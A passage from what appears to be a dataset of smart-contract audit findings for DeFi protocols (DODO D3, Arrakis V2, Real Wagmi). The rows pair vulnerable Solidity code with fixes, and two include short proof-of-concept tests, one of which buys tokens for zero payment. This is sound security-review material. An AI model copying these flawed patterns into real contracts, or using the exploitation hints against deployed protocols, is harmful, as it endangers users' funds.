0 : tokenCumMap[toToken].cumulativeAsk;\\n```\\n\\nThis wrong assignment value definitely will mess up accounting balance, resulting unknown state will occure, which is not expected by the protocol\\nFor one case, this `getRangeOrderState` is being used in `querySellTokens` & `queryBuyTokens` which may later called from `sellToken` and `buyToken`. The issue is when calling `_contructTokenState` which can be reverted from `PMMRangeOrder` when buy or sell token\\n```\\nFile: PMMRangeOrder.sol\\n // B\\n tokenState.B = askOrNot ? tokenState.B0 - tokenMMInfo.cumulativeAsk : tokenState.B0 - tokenMMInfo.cumulativeBid;\\n```\\n\\nWhen the `tokenMMInfo.cumulativeBid` (which was wrongly assign from cumulativeAsk) is bigger than `tokenState.B0`, this will revert",Fix the error to\\n```\\nFile: D3Trading.sol\\n roState.toTokenMMInfo.cumulativeBid =\\n// Remove the line below\\n// Remove the line below\\n: allFlag (toTokenIndex) & 1 == 0 ? 0 : tokenCumMap[toToken].cumulativeAsk;\\n// Add the line below\\n// Add the line below\\n: allFlag (toTokenIndex) & 1 == 0 ? 0 : tokenCumMap[toToken].cumulativeBid;\\n```\\n,"This wrong assignment value definitely will mess up accounting balance, resulting unknown state will occure, which is not expected by the protocol. For example reverting state showing a case above.",```\\nFile: D3Trading.sol\\n roState.toTokenMMInfo.cumulativeBid =\\n allFlag (toTokenIndex) & 1 == 0 ? 0 : tokenCumMap[toToken].cumulativeAsk;\\n```\\n +D3VaultFunding#checkBadDebtAfterAccrue is inaccurate and can lead to further damage to both LP's and MM,medium,"D3VaultFunding#checkBadDebtAfterAccrue makes the incorrect assumption that a collateral ratio of less than 1e18 means that the pool has bad debt. Due to how collateral and debt weight affect the collateral ratio calculation a pool can have a collateral ratio less than 1e18 will still maintaining debt that is profitable to liquidate. 
The result of this is that after this threshold has been passed, a pool can no longer be liquidated by anyone which can lead to continued losses that harm both the LPs and the MM being liquidated.\\nD3VaultFunding.sol#L382-L386\\n```\\n if (balance >= borrows) {\\n collateral += min(balance - borrows, info.maxCollateralAmount).mul(info.collateralWeight).mul(price);\\n } else {\\n debt += (borrows - balance).mul(info.debtWeight).mul(price);\\n }\\n```\\n\\nWhen calculating the collateral and debt values, the value of the collateral is adjusted by the collateralWeight and debtWeight respectively. This can lead to a position in which the collateral ratio is less than 1e18, which incorrectly signals the pool has bad debt via the checkBadDebtAfterAccrue check.\\nExample:\\n```\\nAssume a pool has the following balances and debts:\\n\\nToken A - 100 borrows 125 balance\\nToken B - 100 borrows 80 balance\\n\\nPrice A = 1\\ncollateralWeightA = 0.8\\n\\nPrice B = 1\\ndebtWeightB = 1.2\\n\\ncollateral = 25 * 1 * 0.8 = 20\\ndebt = 20 * 1 * 1.2 = 24\\n\\ncollateralRatio = 20/24 = 0.83\\n```\\n\\nThe problem here is that there is no bad debt at all and it is still profitable to liquidate this pool, even with a discount:\\n```\\nExcessCollateral = 125 - 100 = 25\\n\\n25 * 1 * 0.95 [DISCOUNT] = 23.75\\n\\nExcessDebt = 100 - 80 = 20\\n\\n20 * 1 = 20\\n```\\n\\nThe issue with this is that once this check has been triggered, no other market participants besides DODO can liquidate this position. This creates a significant inefficiency in the market that can easily lead to real bad debt being created for the pool. 
This bad debt is harmful to both the pool MM, who could have been liquidated with remaining collateral, and also the vault LPs who directly pay for the bad debt.",The methodology of the bad debt check should be changed to remove collateral and debt weights to accurately indicate the presence of bad debt.,Unnecessary loss of funds to LPs and MMs,"```\\n if (balance >= borrows) {\\n collateral += min(balance - borrows, info.maxCollateralAmount).mul(info.collateralWeight).mul(price);\\n } else {\\n debt += (borrows - balance).mul(info.debtWeight).mul(price);\\n }\\n```\\n" +D3UserQuote#getUserQuote queries incorrect token for exchangeRate leading to inaccurate quota calculations,medium,"A small typo in the valuation loop of D3UserQuote#getUserQuote uses the wrong variable leading to and incorrect quota being returned. The purpose of a quota is to mitigate risk of positions being too large. This incorrect assumption can dramatically underestimate the quota leading to oversized (and overrisk) positions.\\nD3UserQuota.sol#L75-L84\\n```\\n for (uint256 i = 0; i < tokenList.length; i++) {\\n address _token = tokenList[i];\\n (address assetDToken,,,,,,,,,,) = d3Vault.getAssetInfo(_token);\\n uint256 tokenBalance = IERC20(assetDToken).balanceOf(user);\\n if (tokenBalance > 0) {\\n tokenBalance = tokenBalance.mul(d3Vault.getExchangeRate(token)); <- @audit-issue queries token instead of _token\\n (uint256 tokenPrice, uint8 priceDecimal) = ID3Oracle(d3Vault._ORACLE_()).getOriginalPrice(_token);\\n usedQuota = usedQuota + tokenBalance * tokenPrice / 10 ** (priceDecimal+tokenDecimals);\\n }\\n }\\n```\\n\\nD3UserQuota.sol#L80 incorrectly uses token rather than _token as it should. 
This returns the wrong exchange rate which can dramatically alter the perceived token balance as well as the calculated quota.",Change variable from token to _token:\\n```\\n- tokenBalance = tokenBalance.mul(d3Vault.getExchangeRate(token));\\n+ tokenBalance = tokenBalance.mul(d3Vault.getExchangeRate(_token));\\n```\\n,"Quota is calculated incorrectly leading to overly risky positions, which in turn can cause loss to the system","```\\n for (uint256 i = 0; i < tokenList.length; i++) {\\n address _token = tokenList[i];\\n (address assetDToken,,,,,,,,,,) = d3Vault.getAssetInfo(_token);\\n uint256 tokenBalance = IERC20(assetDToken).balanceOf(user);\\n if (tokenBalance > 0) {\\n tokenBalance = tokenBalance.mul(d3Vault.getExchangeRate(token)); <- @audit-issue queries token instead of _token\\n (uint256 tokenPrice, uint8 priceDecimal) = ID3Oracle(d3Vault._ORACLE_()).getOriginalPrice(_token);\\n usedQuota = usedQuota + tokenBalance * tokenPrice / 10 ** (priceDecimal+tokenDecimals);\\n }\\n }\\n```\\n" +Calculation B0 meets devision 0 error when a token has small decimal and high price with a small kBid,medium,"Here is poc\\n```\\n function testQueryFail() public {\\n token1ChainLinkOracle.feedData(30647 * 1e18);\\n token2ChainLinkOracle.feedData(1 * 1e18);\\n vm.startPrank(maker);\\n uint32[] memory tokenKs = new uint32[](2);\\n tokenKs[0] = 0;\\n tokenKs[1] = (1<< 16) +1;\\n address[] memory tokens = new address[](2);\\n tokens[0] = address(token2);\\n tokens[1] = address(token1);\\n address[] memory slotIndex = new address[](2);\\n slotIndex[0] = address(token1);\\n slotIndex[1] = address(token2);\\n uint80[] memory priceSlot = new uint80[](2);\\n priceSlot[0] = 2191925019632266903652;\\n priceSlot[1] = 720435765840878108682;\\n\\n uint64[] memory amountslot = new uint64[](2);\\n amountslot[0] = stickAmount(10,8, 400000, 18);\\n amountslot[1] = stickAmount(400000, 18, 400000, 18);\\n d3MakerWithPool.setTokensKs(tokens, tokenKs);\\n 
d3MakerWithPool.setTokensPrice(slotIndex, priceSlot);\\n d3MakerWithPool.setTokensAmounts(slotIndex, amountslot);\\n vm.stopPrank();\\n\\n (uint256 askDownPrice, uint256 askUpPrice, uint256 bidDownPrice, uint256 bidUpPrice, uint256 swapFee) =\\n d3MM.getTokenMMPriceInfoForRead(address(token1));\\n assertEq(askDownPrice, 304555028000000000000000000000000);\\n assertEq(askUpPrice, 307231900000000000000000000000000);\\n assertEq(bidDownPrice, 3291);\\n assertEq(bidUpPrice, 3320);\\n assertEq(swapFee, 1200000000000000);\\n\\n //console.log(askDownPrice);\\n //console.log(askUpPrice);\\n //console.log(bidDownPrice);\\n //console.log(bidUpPrice);\\n //console.log(swapFee);\\n\\n (,,uint kask, uint kbid,,) = d3MM.getTokenMMOtherInfoForRead(address(token1));\\n assertEq(kask, 1e14);\\n assertEq(kbid, 1e14);\\n\\n (askDownPrice, askUpPrice, bidDownPrice, bidUpPrice, swapFee) =\\n d3MM.getTokenMMPriceInfoForRead(address(token2));\\n assertEq(askDownPrice, 999999960000000000);\\n assertEq(askUpPrice, 1000799800000000000);\\n assertEq(bidDownPrice, 1000400120032008002);\\n assertEq(bidUpPrice, 1001201241249250852);\\n assertEq(swapFee, 200000000000000);\\n\\n (,,kask, kbid,,) = d3MM.getTokenMMOtherInfoForRead(address(token2));\\n assertEq(kask, 0);\\n assertEq(kbid, 0);\\n\\n //console.log(askDownPrice);\\n //console.log(askUpPrice);\\n //console.log(bidDownPrice);\\n //console.log(bidUpPrice);\\n //console.log(swapFee);\\n //console.log(kask);\\n //console.log(kbid);\\n\\n SwapCallbackData memory swapData;\\n swapData.data = """";\\n swapData.payer = user1;\\n\\n //uint256 gasleft1 = gasleft();\\n uint256 receiveToToken = d3Proxy.sellTokens(\\n address(d3MM),\\n user1,\\n address(token1),\\n address(token2),\\n 1000000,\\n 0,\\n abi.encode(swapData),\\n block.timestamp + 1000\\n );\\n```\\n\\nIt will revert. 
In this example, wbtc price is 30445, and k = 0.0001, suppose maker contains rules, but model is invalid.","Fix formula for this corner case, like making temp2 = 1\\nImprove calculation accuracy by consistently using precision 18 for calculations and converting to real decimal when processing amounts.",Maker sets right parameters but traders can't swap. It will make swap model invalid.\\nTool Used\\nManual Review,"```\\n function testQueryFail() public {\\n token1ChainLinkOracle.feedData(30647 * 1e18);\\n token2ChainLinkOracle.feedData(1 * 1e18);\\n vm.startPrank(maker);\\n uint32[] memory tokenKs = new uint32[](2);\\n tokenKs[0] = 0;\\n tokenKs[1] = (1<< 16) +1;\\n address[] memory tokens = new address[](2);\\n tokens[0] = address(token2);\\n tokens[1] = address(token1);\\n address[] memory slotIndex = new address[](2);\\n slotIndex[0] = address(token1);\\n slotIndex[1] = address(token2);\\n uint80[] memory priceSlot = new uint80[](2);\\n priceSlot[0] = 2191925019632266903652;\\n priceSlot[1] = 720435765840878108682;\\n\\n uint64[] memory amountslot = new uint64[](2);\\n amountslot[0] = stickAmount(10,8, 400000, 18);\\n amountslot[1] = stickAmount(400000, 18, 400000, 18);\\n d3MakerWithPool.setTokensKs(tokens, tokenKs);\\n d3MakerWithPool.setTokensPrice(slotIndex, priceSlot);\\n d3MakerWithPool.setTokensAmounts(slotIndex, amountslot);\\n vm.stopPrank();\\n\\n (uint256 askDownPrice, uint256 askUpPrice, uint256 bidDownPrice, uint256 bidUpPrice, uint256 swapFee) =\\n d3MM.getTokenMMPriceInfoForRead(address(token1));\\n assertEq(askDownPrice, 304555028000000000000000000000000);\\n assertEq(askUpPrice, 307231900000000000000000000000000);\\n assertEq(bidDownPrice, 3291);\\n assertEq(bidUpPrice, 3320);\\n assertEq(swapFee, 1200000000000000);\\n\\n //console.log(askDownPrice);\\n //console.log(askUpPrice);\\n //console.log(bidDownPrice);\\n //console.log(bidUpPrice);\\n //console.log(swapFee);\\n\\n (,,uint kask, uint kbid,,) = 
d3MM.getTokenMMOtherInfoForRead(address(token1));\\n assertEq(kask, 1e14);\\n assertEq(kbid, 1e14);\\n\\n (askDownPrice, askUpPrice, bidDownPrice, bidUpPrice, swapFee) =\\n d3MM.getTokenMMPriceInfoForRead(address(token2));\\n assertEq(askDownPrice, 999999960000000000);\\n assertEq(askUpPrice, 1000799800000000000);\\n assertEq(bidDownPrice, 1000400120032008002);\\n assertEq(bidUpPrice, 1001201241249250852);\\n assertEq(swapFee, 200000000000000);\\n\\n (,,kask, kbid,,) = d3MM.getTokenMMOtherInfoForRead(address(token2));\\n assertEq(kask, 0);\\n assertEq(kbid, 0);\\n\\n //console.log(askDownPrice);\\n //console.log(askUpPrice);\\n //console.log(bidDownPrice);\\n //console.log(bidUpPrice);\\n //console.log(swapFee);\\n //console.log(kask);\\n //console.log(kbid);\\n\\n SwapCallbackData memory swapData;\\n swapData.data = """";\\n swapData.payer = user1;\\n\\n //uint256 gasleft1 = gasleft();\\n uint256 receiveToToken = d3Proxy.sellTokens(\\n address(d3MM),\\n user1,\\n address(token1),\\n address(token2),\\n 1000000,\\n 0,\\n abi.encode(swapData),\\n block.timestamp + 1000\\n );\\n```\\n" +"When swapping 18-decimal token to 8-decimal token , user could buy decimal-18-token with 0 amount of decimal-8-token",medium,"Here is the poc:\\n```\\nuint256 payFromToken = d3Proxy.buyTokens(\\n address(d3MM),\\n user1,\\n address(token1),\\n address(token2),\\n 10000000,\\n 0,\\n abi.encode(swapData),\\n block.timestamp + 1000\\n );\\nassertEq(payFromToken, 0);\\n```\\n","In buyToken() of D3Trading.sol, add this rule:\\n```\\nif(payFromAmount == 0) { // value too small\\n payFromAmount = 1;\\n }\\n```\\n",It may cause unexpected loss\\nTool Used\\nManual Review,"```\\nuint256 payFromToken = d3Proxy.buyTokens(\\n address(d3MM),\\n user1,\\n address(token1),\\n address(token2),\\n 10000000,\\n 0,\\n abi.encode(swapData),\\n block.timestamp + 1000\\n );\\nassertEq(payFromToken, 0);\\n```\\n" +ArrakisV2Router#addLiquidityPermit2 will strand ETH,high,"Inside 
ArrakisV2Router#addLiquidityPermit2, `isToken0Weth` is set incorrectly leading to the wrong amount of ETH being refunded to the user\\nArrakisV2Router.sol#L278-L298\\n```\\n bool isToken0Weth;\\n _permit2Add(params_, amount0, amount1, token0, token1);\\n\\n _addLiquidity(\\n params_.addData.vault,\\n amount0,\\n amount1,\\n sharesReceived,\\n params_.addData.gauge,\\n params_.addData.receiver,\\n token0,\\n token1\\n );\\n\\n if (msg.value > 0) {\\n if (isToken0Weth && msg.value > amount0) {\\n payable(msg.sender).sendValue(msg.value - amount0);\\n } else if (!isToken0Weth && msg.value > amount1) {\\n payable(msg.sender).sendValue(msg.value - amount1);\\n }\\n }\\n```\\n\\nAbove we see that excess msg.value is returned to the user at the end of the function. This uses the value of `isToken0Weth` to determine the amount to send back to the user. The issue is that `isToken0Weth` is set incorrectly and will lead to ETH being stranded in the contract. `isToken0Weth` is never set, it will always be `false`. This means that when WETH actually is token0 the incorrect amount of ETH will be sent back to the user.\\nThis same issue can also be used to steal the ETH left in the contract by a malicious user. 
To make matters worse, the attacker can manipulate the underlying pools to increase the amount of ETH left in the contract so they can steal even more.","Move `isToken0Weth` and set it correctly:\\n```\\n- bool isToken0Weth;\\n _permit2Add(params_, amount0, amount1, token0, token1);\\n\\n _addLiquidity(\\n params_.addData.vault,\\n amount0,\\n amount1,\\n sharesReceived,\\n params_.addData.gauge,\\n params_.addData.receiver,\\n token0,\\n token1\\n );\\n\\n if (msg.value > 0) {\\n+ bool isToken0Weth = _isToken0Weth(address(token0), address(token1));\\n if (isToken0Weth && msg.value > amount0) {\\n payable(msg.sender).sendValue(msg.value - amount0);\\n } else if (!isToken0Weth && msg.value > amount1) {\\n payable(msg.sender).sendValue(msg.value - amount1);\\n }\\n }\\n```\\n",ETH will be stranded in contract and stolen,"```\\n bool isToken0Weth;\\n _permit2Add(params_, amount0, amount1, token0, token1);\\n\\n _addLiquidity(\\n params_.addData.vault,\\n amount0,\\n amount1,\\n sharesReceived,\\n params_.addData.gauge,\\n params_.addData.receiver,\\n token0,\\n token1\\n );\\n\\n if (msg.value > 0) {\\n if (isToken0Weth && msg.value > amount0) {\\n payable(msg.sender).sendValue(msg.value - amount0);\\n } else if (!isToken0Weth && msg.value > amount1) {\\n payable(msg.sender).sendValue(msg.value - amount1);\\n }\\n }\\n```\\n" +Then getAmountsForDelta function at Underlying.sol is implemented incorrectly,medium,"The function `getAmountsForDelta()` at the `Underlying.sol` contract is used to compute the quantity of `token0` and `token1` to add to the position given a delta of liquidity. These quantities depend on the delta of liquidity, the current tick and the ticks of the range boundaries. 
Actually, `getAmountsForDelta()` uses the sqrt prices instead of the ticks, but they are equivalent since each tick represents a sqrt price.\\nThere exists 3 cases:\\nThe current tick is outside the range from the left, this means only `token0` should be added.\\nThe current tick is within the range, this means both `token0` and `token1` should be added.\\nThe current tick is outside the range from the right, this means only `token1` should be added.\\nThe issue on the implementation is on the first case, which is coded as follows:\\n```\\nif (sqrtRatioX96 <= sqrtRatioAX96) {\\n amount0 = SafeCast.toUint256(\\n SqrtPriceMath.getAmount0Delta(\\n sqrtRatioAX96,\\n sqrtRatioBX96,\\n liquidity\\n )\\n );\\n} \\n```\\n\\nThe implementation says that if the current price is equal to the price of the lower tick, it means that it is outside of the range and hence only `token0` should be added to the position.\\nBut for the UniswapV3 implementation, the current price must be lower in order to consider it outside:\\n```\\nif (_slot0.tick < params.tickLower) {\\n // current tick is below the passed range; liquidity can only become in range by crossing from left to\\n // right, when we'll need _more_ token0 (it's becoming more valuable) so user must provide it\\n amount0 = SqrtPriceMath.getAmount0Delta(\\n TickMath.getSqrtRatioAtTick(params.tickLower),\\n TickMath.getSqrtRatioAtTick(params.tickUpper),\\n params.liquidityDelta\\n );\\n}\\n```\\n\\nReference","Change from:\\n```\\n// @audit-issue Change <= to <.\\nif (sqrtRatioX96 <= sqrtRatioAX96) {\\n amount0 = SafeCast.toUint256(\\n SqrtPriceMath.getAmount0Delta(\\n sqrtRatioAX96,\\n sqrtRatioBX96,\\n liquidity\\n )\\n );\\n}\\n```\\n\\nto:\\n```\\nif (sqrtRatioX96 < sqrtRatioAX96) {\\n amount0 = SafeCast.toUint256(\\n SqrtPriceMath.getAmount0Delta(\\n sqrtRatioAX96,\\n sqrtRatioBX96,\\n liquidity\\n )\\n );\\n}\\n```\\n","When the current price is equal to the left boundary of the range, the uniswap pool will request both 
`token0` and `token1`, but arrakis will only request from the user `token0` so the pool will lose some `token1` if it has enough to cover it.","```\\nif (sqrtRatioX96 <= sqrtRatioAX96) {\\n amount0 = SafeCast.toUint256(\\n SqrtPriceMath.getAmount0Delta(\\n sqrtRatioAX96,\\n sqrtRatioBX96,\\n liquidity\\n )\\n );\\n} \\n```\\n" +outdated variable is not effective to check price feed timeliness,medium,"In ChainlinkOraclePivot, it uses one `outdated` variable to check if the two price feeds are `outdated`. However, this is not effective because the price feeds have different update frequencies.\\nLet's have an example:\\nIn Polygon mainnet, ChainlinkOraclePivot uses two Chainlink price feeds: MATIC/ETH and ETH/USD.\\nWe can see that\\nIn function `_getLatestRoundData`, both price feeds use the same `outdated` variable.\\nIf we set the `outdated` variable to 27s, the priceFeedA will revert most of the time since it is too short for the 86400s heartbeat.\\nIf we set the `outdated` variable to 86400s, the priceFeedB can have a very `outdated` value without revert.\\n```\\n try priceFeedA.latestRoundData() returns (\\n uint80,\\n int256 price,\\n uint256,\\n uint256 updatedAt,\\n uint80\\n ) {\\n require(\\n block.timestamp - updatedAt <= outdated, // solhint-disable-line not-rely-on-time\\n ""ChainLinkOracle: priceFeedA outdated.""\\n );\\n\\n priceA = SafeCast.toUint256(price);\\n } catch {\\n revert(""ChainLinkOracle: price feed A call failed."");\\n }\\n\\n try priceFeedB.latestRoundData() returns (\\n uint80,\\n int256 price,\\n uint256,\\n uint256 updatedAt,\\n uint80\\n ) {\\n require(\\n block.timestamp - updatedAt <= outdated, // solhint-disable-line not-rely-on-time\\n ""ChainLinkOracle: priceFeedB outdated.""\\n );\\n\\n priceB = SafeCast.toUint256(price);\\n } catch {\\n revert(""ChainLinkOracle: price feed B call failed."");\\n }\\n```\\n",Having two `outdated` values for each price feed A and B.,The `outdated` variable is not effective to check the 
timeliness of prices. It can allow stale prices in one price feed or always revert in another price feed.,"```\\n try priceFeedA.latestRoundData() returns (\\n uint80,\\n int256 price,\\n uint256,\\n uint256 updatedAt,\\n uint80\\n ) {\\n require(\\n block.timestamp - updatedAt <= outdated, // solhint-disable-line not-rely-on-time\\n ""ChainLinkOracle: priceFeedA outdated.""\\n );\\n\\n priceA = SafeCast.toUint256(price);\\n } catch {\\n revert(""ChainLinkOracle: price feed A call failed."");\\n }\\n\\n try priceFeedB.latestRoundData() returns (\\n uint80,\\n int256 price,\\n uint256,\\n uint256 updatedAt,\\n uint80\\n ) {\\n require(\\n block.timestamp - updatedAt <= outdated, // solhint-disable-line not-rely-on-time\\n ""ChainLinkOracle: priceFeedB outdated.""\\n );\\n\\n priceB = SafeCast.toUint256(price);\\n } catch {\\n revert(""ChainLinkOracle: price feed B call failed."");\\n }\\n```\\n" +Update to `managerFeeBPS` applied to pending tokens yet to be claimed,medium,"A manager (malicious or not) can update the `managerFeeBPS` by calling `ArrakisV2.setManagerFeeBPS()`. 
The newly-updated `managerFeeBPS` will be retroactively applied to the pending fees yet to be claimed by the `ArrakisV2` contract.\\nWhenever UniV3 fees are collected (via `burn()` or rebalance()), the manager fees are applied to the received pending tokens.\\n```\\nfunction _applyFees(uint256 fee0_, uint256 fee1_) internal {\\n uint16 mManagerFeeBPS = managerFeeBPS;\\n managerBalance0 += (fee0_ * mManagerFeeBPS) / hundredPercent;\\n managerBalance1 += (fee1_ * mManagerFeeBPS) / hundredPercent;\\n}\\n```\\n\\nSince the manager can update the `managerFeeBPS` whenever, this calculation can be altered to take up to 100% of the pending fees in favor of the manager.\\n```\\nfunction setManagerFeeBPS(uint16 managerFeeBPS_) external onlyManager {\\n require(managerFeeBPS_ <= 10000, ""MFO"");\\n managerFeeBPS = managerFeeBPS_;\\n emit LogSetManagerFeeBPS(managerFeeBPS_);\\n}\\n```\\n","Fees should be collected at the start of execution within the `setManagerFeeBPS()` function. This effectively checkpoints the fees properly, prior to updating the `managerFeeBPS` variable.",Manager's ability to intentionally or accidently steal pending fees owed to stakers,"```\\nfunction _applyFees(uint256 fee0_, uint256 fee1_) internal {\\n uint16 mManagerFeeBPS = managerFeeBPS;\\n managerBalance0 += (fee0_ * mManagerFeeBPS) / hundredPercent;\\n managerBalance1 += (fee1_ * mManagerFeeBPS) / hundredPercent;\\n}\\n```\\n" +Wrong calculation of `tickCumulatives` due to hardcoded pool fees,high,"Wrong calculation of `tickCumulatives` due to hardcoded pool fees\\nReal Wagmi is using a hardcoded `500` fee to calculate the `amountOut` to check for slippage and revert if it was to high, or got less funds back than expected.\\n```\\n IUniswapV3Pool(underlyingTrustedPools[500].poolAddress)\\n```\\n\\nThere are several problems with the hardcoding of the `500` as the fee.\\nNot all tokens have `500` fee pools\\nThe swapping takes place in pools that don't have a `500` fee\\nThe `500` pool fee is not 
the optimal to fetch the `tickCumulatives` due to low volume\\nSpecially as they are deploying in so many secondary chains like Kava, this will be a big problem pretty much in every transaction over there.\\nIf any of those scenarios is given, `tickCumulatives` will be incorrectly calculated and it will set an incorrect slippage return.",Consider allowing the fees as an input and consider not even picking low TVL pools with no transations,Incorrect slippage calculation will increase the risk of `rebalanceAll()` rebalance getting rekt.,```\\n IUniswapV3Pool(underlyingTrustedPools[500].poolAddress)\\n```\\n +No slippage protection when withdrawing and providing liquidity in rebalanceAll,high,"When `rebalanceAll` is called, the liquidity is first withdrawn from the pools and then deposited to new positions. However, there is no slippage protection for these operations.\\nIn the `rebalanceAll` function, it first withdraws all liquidity from the pools and deposits all liquidity to new positions.\\n```\\n _withdraw(_totalSupply, _totalSupply);\\n```\\n\\n```\\n _deposit(reserve0, reserve1, _totalSupply, slots);\\n```\\n\\nHowever, there are no parameters for `amount0Min` and `amount1Min`, which are used to prevent slippage. 
These parameters should be checked to create slippage protections.\\nActually, they are implemented in the `deposit` and `withdraw` functions, but just not in the rebalanceAll function.",Implement slippage protection in rebalanceAll as suggested to avoid loss to the protocol.,The withdraw and provide liquidity operations in rebalanceAll are exposed to high slippage and could result in a loss for LPs of multipool.,"```\\n _withdraw(_totalSupply, _totalSupply);\\n```\\n" +Usage of `slot0` is extremely easy to manipulate,high,"Usage of `slot0` is extremely easy to manipulate\\nReal Wagmi is using `slot0` to calculate several variables in their codebase:\\nslot0 is the most recent data point and is therefore extremely easy to manipulate.\\nMultipool directly uses the token values returned by `getAmountsForLiquidity`\\n```\\n (uint256 amount0, uint256 amount1) = LiquidityAmounts.getAmountsForLiquidity(\\n slots[i].currentSqrtRatioX96,\\n TickMath.getSqrtRatioAtTick(position.lowerTick),\\n TickMath.getSqrtRatioAtTick(position.upperTick),\\n liquidity\\n );\\n```\\n\\nto calculate the reserves.\\n```\\n reserve0 += amount0;\\n reserve1 += amount1;\\n```\\n",To make any calculation use a TWAP instead of slot0.,Pool lp value can be manipulated and cause other users to receive less lp tokens.,"```\\n (uint256 amount0, uint256 amount1) = LiquidityAmounts.getAmountsForLiquidity(\\n slots[i].currentSqrtRatioX96,\\n TickMath.getSqrtRatioAtTick(position.lowerTick),\\n TickMath.getSqrtRatioAtTick(position.upperTick),\\n liquidity\\n );\\n```\\n" +"The `_estimateWithdrawalLp` function might return a very large value, result in users losing significant incentives or being unable to withdraw from the Dispatcher contract",high,"The `_estimateWithdrawalLp` function might return a very large value, result in users losing significant incentives or being unable to withdraw from the Dispatcher contract\\nIn Dispatcher contract, `_estimateWithdrawalLp` function returns the value of shares 
amount based on the average of ratios `amount0 / reserve0` and `amount1 / reserve1`.\\n```\\nfunction _estimateWithdrawalLp(\\n uint256 reserve0,\\n uint256 reserve1,\\n uint256 _totalSupply,\\n uint256 amount0,\\n uint256 amount1\\n) private pure returns (uint256 shareAmount) {\\n shareAmount =\\n ((amount0 * _totalSupply) / reserve0 + (amount1 * _totalSupply) / reserve1) /\\n 2;\\n}\\n```\\n\\nFrom `Dispatcher.withdraw` and `Dispatcher.deposit` function, amount0 and amount1 will be the accumulated fees of users\\n```\\nuint256 lpAmount;\\n{\\n (uint256 fee0, uint256 fee1) = _calcFees(feesGrow, user);\\n lpAmount = _estimateWithdrawalLp(reserve0, reserve1, _totalSupply, fee0, fee1);\\n}\\nuser.shares -= lpAmount;\\n_withdrawFee(pool, lpAmount, reserve0, reserve1, _totalSupply, deviationBP);\\n```\\n\\nHowever, it is important to note that the values of reserve0 and reserve1 can fluctuate significantly. This is because the positions of the Multipool in UniSwapV3 pools (concentrated) are unstable on-chain, and they can change substantially as the state of the pools changes. As a result, the `_estimateWithdrawalLp` function might return a large value even for a small fee amount. 
This could potentially lead to reverting due to underflow in the deposit function (in cases where lpAmount > user.shares), or it could result in withdrawing a larger amount of Multipool LP than initially expected.\\nScenario:\\nTotal supply of Multipool is 1e18, and Alice has 1e16 (1%) LP amounts which are deposited into the Dispatcher contract.\\nAlice accrued fees = 200 USDC and 100 USDT\\nThe reserves of Multipool are 100,000 USDC and 100,000 USDT, `_estimateWithdrawalLp` of Alice fees will be `(0.2% + 0.1%) / 2 * totalSupply` = `0.15% * totalSupply` = 1.5e15 LP amounts\\nHowever, in some cases, UniSwapV3 pools may experience fluctuations, reserves of Multipool are 10,000 USDC and 190,000 USDT, `_estimateWithdrawalLp` of Alice fees will be `(2% + 0.052%) / 2 * totalSupply` = `1.026% * totalSupply` = 1.026e16 LP amounts. This result is greater than LP amounts of Alice (1e16), leading to reverting by underflow in the deposit/withdraw function of the Dispatcher contract.",Shouldn't use the average ratio for calculation in the `_estimateWithdrawalLp` function,"Users may face 2 potential issues when interacting with the Dispatcher contract.\\nThey might be unable to deposit/withdraw\\nSecondly, users could potentially lose significant incentives when depositing or withdrawing due to unexpected withdrawals of LP amounts for their fees.","```\\nfunction _estimateWithdrawalLp(\\n uint256 reserve0,\\n uint256 reserve1,\\n uint256 _totalSupply,\\n uint256 amount0,\\n uint256 amount1\\n) private pure returns (uint256 shareAmount) {\\n shareAmount =\\n ((amount0 * _totalSupply) / reserve0 + (amount1 * _totalSupply) / reserve1) /\\n 2;\\n}\\n```\\n" +The deposit - withdraw - trade transaction lack of expiration timestamp check (DeadLine check),medium,"The deposit - withdraw - trade transaction lack of expiration timestamp check (DeadLine check)\\nthe protocol is missing the DEADLINE check entirely in its logic.\\nthis is actually how uniswap implemented the Deadline, this protocol also needs a deadline check 
like this logic\\n```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n\\nthe point is the deadline check\\n```\\nmodifier ensure(uint deadline) {\\n require(deadline >= block.timestamp, 
